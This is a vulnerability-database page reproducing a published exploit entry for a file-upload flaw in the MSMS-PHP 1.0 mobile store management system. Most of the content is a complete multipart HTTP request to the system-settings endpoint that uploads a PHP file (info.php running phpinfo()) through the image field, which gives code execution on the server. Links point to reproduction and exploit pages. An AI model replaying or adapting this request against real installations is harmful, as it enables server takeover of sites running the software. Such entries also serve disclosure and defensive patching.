Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:177558
HistoryMar 13, 2024 - 12:00 a.m.

MSMS-PHP 1.0 Shell Upload

2024-03-1300:00:00
nu11secur1ty
packetstormsecurity.com
52
msms-php
file upload
rce
critical vulnerability
php
server upload
security issue

7.4 High

AI Score

Confidence

Low

JSON
`## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using  
## Author: nu11secur1ty  
## Date: 03/13/2024  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload  
  
## Description:  
The upload function and id=cimg parameter are not sanitizing correctly!  
The attacker can upload any PHP file which he can execute directly on  
the server!  
  
STATUS: HIGH-CrITICAL Vulnerability  
  
[+]Payload:  
```POST  
POST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1  
Host: localhost  
Content-Length: 6318  
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundarypV7nBYU4nAonvWel  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112  
Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/mobile_store/admin/?page=system_info  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dg  
Connection: close  
  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="name"  
  
Mobile Store Management System - PHP  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="short_name"  
  
MSMS-PHP  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="about_us"  
  
<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;  
margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:  
70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:  
0px; clear: both; border-top: 0px; height: 1px; background-image:  
linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),  
rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:  
0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px  
-160px; padding: 0px; position: sticky; top: 20px; width: 160px;  
height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);  
font-family: "Open Sans", Arial, sans-serif; font-size: 14px;  
background-color: rgb(255, 255, 255);"></div><div id="bannerR"  
style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;  
top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,  
0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;  
background-color: rgb(255, 255, 255);"></div><div class="boxed"  
style="margin: 10px 28.7969px; padding: 0px; clear: both; color:  
rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:  
14px; text-align: center; background-color: rgb(255, 255, 255);"><div  
id="lipsum" style="margin: 0px; padding: 0px; text-align:  
justify;"></div></div></div><p style="margin-right: 0px;  
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum  
dolor sit amet, consectetur adipiscing elit. Nullam non ultrices  
tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas  
iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit  
vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin  
lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et  
malesuada fames ac ante ipsum primis in faucibus. Pellentesque  
habitant morbi tristique senectus et netus et malesuada fames ac  
turpis egestas. Praesent eleifend interdum est, at gravida erat  
molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur  
et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus  
porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus  
sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at  
lacus vehicula, aliquam purus quis, pharetra lorem.</p><p  
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;  
padding: 0px;">Proin consectetur massa ut quam molestie porta. Donec  
sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent  
per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar  
ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu  
blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend  
id, aliquet ut libero. Nunc scelerisque vulputate turpis quis  
volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum  
imperdiet, nulla vitae pharetra pretium, magna felis placerat libero,  
quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper  
cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien  
consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae  
tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,  
id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;  
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id ante  
vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat  
turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus  
pulvinar, eros id ultricies mollis, lectus velit viverra mi, at  
venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh  
felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur  
dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in  
convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula  
pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p  
style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;  
padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis id  
cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit  
ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non  
lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at  
pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,  
vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in  
tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis  
dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque  
mauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;  
margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quis  
imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus  
lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique  
nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae  
nisi. Curabitur at quam ut libero convallis mattis vel eget mauris.  
Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus  
nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum  
non magna at, molestie gravida magna. Aenean neque sapien, volutpat a  
ullamcorper nec, iaculis quis est.</p>  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="privacy_policy"  
  
<p>Sample Privacy Policy<br></p>  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="files"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="img"; filename="info.php"  
Content-Type: application/octet-stream  
  
<?php  
phpinfo();  
?>  
  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="cover"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundarypV7nBYU4nAonvWel  
Content-Disposition: form-data; name="banners[]"; filename=""  
Content-Type: application/octet-stream  
  
  
------WebKitFormBoundarypV7nBYU4nAonvWel--  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)  
  
## Time spent:  
00:05:00  
  
  
`

7.4 High

AI Score

Confidence

Low

JSON